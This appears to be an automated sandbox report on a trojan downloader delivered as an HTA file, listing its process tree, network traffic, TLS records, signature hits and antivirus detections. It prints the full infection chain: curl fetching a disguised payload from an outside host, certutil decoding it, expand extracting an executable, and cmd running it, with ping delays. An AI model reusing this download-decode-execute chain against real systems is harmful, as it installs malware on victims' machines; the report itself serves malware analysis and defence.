Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Jan. 16, 2024, 10:01 a.m. | Jan. 16, 2024, 10:03 a.m. |
-
iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\M.hta.html
2612-
-
-
PING.EXE ping -n 10 127.0.0.1
2056
-
-
-
PING.EXE ping -n 20 127.0.0.1
2492
-
-
curl.exe "C:\util\curl\curl.exe" https://mail.chapanakit-rta.com/pt/wct9D39.jpg -o C:\Users\Public\Documents\wct9D39.jpg
2248 -
certutil.exe "C:\Windows\System32\certutil.exe" -decode "C:\Users\Public\Documents\wct9D39.jpg" "C:\Users\Public\Documents\wct9D39.tmp"
676 -
-
PING.EXE ping -n 10 127.0.0.1
2976
-
-
expand.exe "C:\Windows\System32\expand.exe" C:\Users\Public\Documents\wct9D39.tmp -f:* c:\users\public\Videos\winp.exe
2272 -
-
PING.EXE ping -n 5 127.0.0.1
2180
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c c:\users\public\Videos\winp.exe
2428
-
-
iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2612 CREDAT:79876
2936
-
Name | Response | Post-Analysis Lookup |
---|---|---|
mail.chapanakit-rta.com | 203.113.25.99 |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49172 203.113.25.99:443 |
C=BE, O=GlobalSign nv-sa, CN=AlphaSSL CA - SHA256 - G4 | CN=*.chapanakit-rta.com | 71:c1:ac:d9:40:ee:0f:2b:f4:f8:b9:d7:c2:d3:69:e5:47:a5:30:cc |
TLSv1 192.168.56.101:49174 203.113.25.99:443 |
None | None | None |
TLSv1 192.168.56.101:49171 203.113.25.99:443 |
C=BE, O=GlobalSign nv-sa, CN=AlphaSSL CA - SHA256 - G4 | CN=*.chapanakit-rta.com | 71:c1:ac:d9:40:ee:0f:2b:f4:f8:b9:d7:c2:d3:69:e5:47:a5:30:cc |
TLSv1 192.168.56.101:49175 203.113.25.99:443 |
None | None | None |
TLS 1.2 192.168.56.101:49182 203.113.25.99:443 |
C=BE, O=GlobalSign nv-sa, CN=AlphaSSL CA - SHA256 - G4 | CN=*.chapanakit-rta.com | 71:c1:ac:d9:40:ee:0f:2b:f4:f8:b9:d7:c2:d3:69:e5:47:a5:30:cc |
request | GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml |
request | GET https://mail.chapanakit-rta.com/images/happynewyear.jpg |
request | GET https://mail.chapanakit-rta.com/favicon.ico |
cmdline | C:\Windows\System32\cmd.exe /c ping -n 20 127.0.0.1 > nul |
cmdline | C:\Windows\System32\cmd.exe /c ping -n 10 127.0.0.1 > nul |
cmdline | C:\Windows\System32\cmd.exe /c ping -n 5 127.0.0.1 > nul |
cmdline | "C:\Windows\system32\cmd.exe" /c ping -n 20 127.0.0.1 > nul |
cmdline | "C:\Windows\System32\cmd.exe" /c c:\users\public\Videos\winp.exe |
cmdline | "C:\Windows\system32\cmd.exe" /c ping -n 10 127.0.0.1 > nul |
cmdline | "C:\Windows\system32\cmd.exe" /c ping -n 5 127.0.0.1 > nul |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
cmdline | C:\Windows\System32\cmd.exe /c ping -n 20 127.0.0.1 > nul |
cmdline | C:\Windows\System32\cmd.exe /c ping -n 10 127.0.0.1 > nul |
cmdline | C:\Windows\System32\cmd.exe /c ping -n 5 127.0.0.1 > nul |
cmdline | ping -n 5 127.0.0.1 |
cmdline | ping -n 20 127.0.0.1 |
cmdline | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2612 CREDAT:145409 |
cmdline | "C:\Windows\system32\cmd.exe" /c ping -n 20 127.0.0.1 > nul |
cmdline | "C:\Windows\system32\cmd.exe" /c ping -n 10 127.0.0.1 > nul |
cmdline | "C:\Windows\system32\cmd.exe" /c ping -n 5 127.0.0.1 > nul |
cmdline | ping -n 10 127.0.0.1 |
cmdline | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2612 CREDAT:79876 |
host | 117.18.232.200 |
Lionic | Trojan.HTML.SAgent.4!c |
VIPRE | Generic.JS.Downloader.A.7F4138D0 |
Arcabit | Generic.JS.Downloader.A.7F4138D0 |
Symantec | Trojan Horse |
ESET-NOD32 | JS/TrojanDownloader.Agent.AALB |
Avast | Other:Malware-gen [Trj] |
Kaspersky | HEUR:Trojan.HTA.SAgent.gen |
BitDefender | Generic.JS.Downloader.A.7F4138D0 |
MicroWorld-eScan | Generic.JS.Downloader.A.7F4138D0 |
Rising | Downloader.Agent/JS!8.10EAD (TOPIS:E0:oPn7BTjgPIO) |
Emsisoft | Generic.JS.Downloader.A.7F4138D0 (B) |
Detected | |
Microsoft | Trojan:HTML/Phish!MSR |
ZoneAlarm | HEUR:Trojan.HTA.SAgent.gen |
GData | Generic.JS.Downloader.A.7F4138D0 |
Tencent | Js.Trojan-Downloader.Er.Rgil |
Ikarus | Virus.SuspectCRC |
AVG | Other:Malware-gen [Trj] |
parent_process | iexplore.exe | martian_process | cmd /c c:\users\public\Videos\winp.exe |
parent_process | iexplore.exe | martian_process | C:\Windows\System32\cmd.exe /c ping -n 10 127.0.0.1 > nul | ||||||
parent_process | iexplore.exe | martian_process | C:\Windows\System32\cmd.exe /c ping -n 5 127.0.0.1 > nul | ||||||
parent_process | iexplore.exe | martian_process | "C:\Windows\System32\expand.exe" C:\Users\Public\Documents\wct9D39.tmp -f:* c:\users\public\Videos\winp.exe | ||||||
parent_process | iexplore.exe | martian_process | "C:\Windows\system32\cmd.exe" /c ping -n 10 127.0.0.1 > nul | ||||||
parent_process | iexplore.exe | martian_process | C:\Windows\System32\cmd.exe /c ping -n 20 127.0.0.1 > nul | ||||||
parent_process | iexplore.exe | martian_process | https://mail.chapanakit-rta.com/images/happynewyear.jpg | ||||||
parent_process | iexplore.exe | martian_process | "C:\Windows\system32\cmd.exe" /c ping -n 20 127.0.0.1 > nul | ||||||
parent_process | iexplore.exe | martian_process | cmd /c c:\users\public\Videos\winp.exe | ||||||
parent_process | iexplore.exe | martian_process | "C:\Windows\System32\cmd.exe" /c c:\users\public\Videos\winp.exe | ||||||
parent_process | iexplore.exe | martian_process | curl https://mail.chapanakit-rta.com/pt/wct9D39.jpg -o C:\Users\Public\Documents\wct9D39.jpg | ||||||
parent_process | iexplore.exe | martian_process | "C:\Windows\system32\cmd.exe" /c ping -n 5 127.0.0.1 > nul | ||||||
parent_process | iexplore.exe | martian_process | "C:\util\curl\curl.exe" https://mail.chapanakit-rta.com/pt/wct9D39.jpg -o C:\Users\Public\Documents\wct9D39.jpg | ||||||
parent_process | iexplore.exe | martian_process | certutil.exe -decode "C:\Users\Public\Documents\wct9D39.jpg" "C:\Users\Public\Documents\wct9D39.tmp" | ||||||
parent_process | iexplore.exe | martian_process | expand C:\Users\Public\Documents\wct9D39.tmp -f:* c:\users\public\Videos\winp.exe | ||||||
parent_process | iexplore.exe | martian_process | "C:\Windows\System32\certutil.exe" -decode "C:\Users\Public\Documents\wct9D39.jpg" "C:\Users\Public\Documents\wct9D39.tmp" |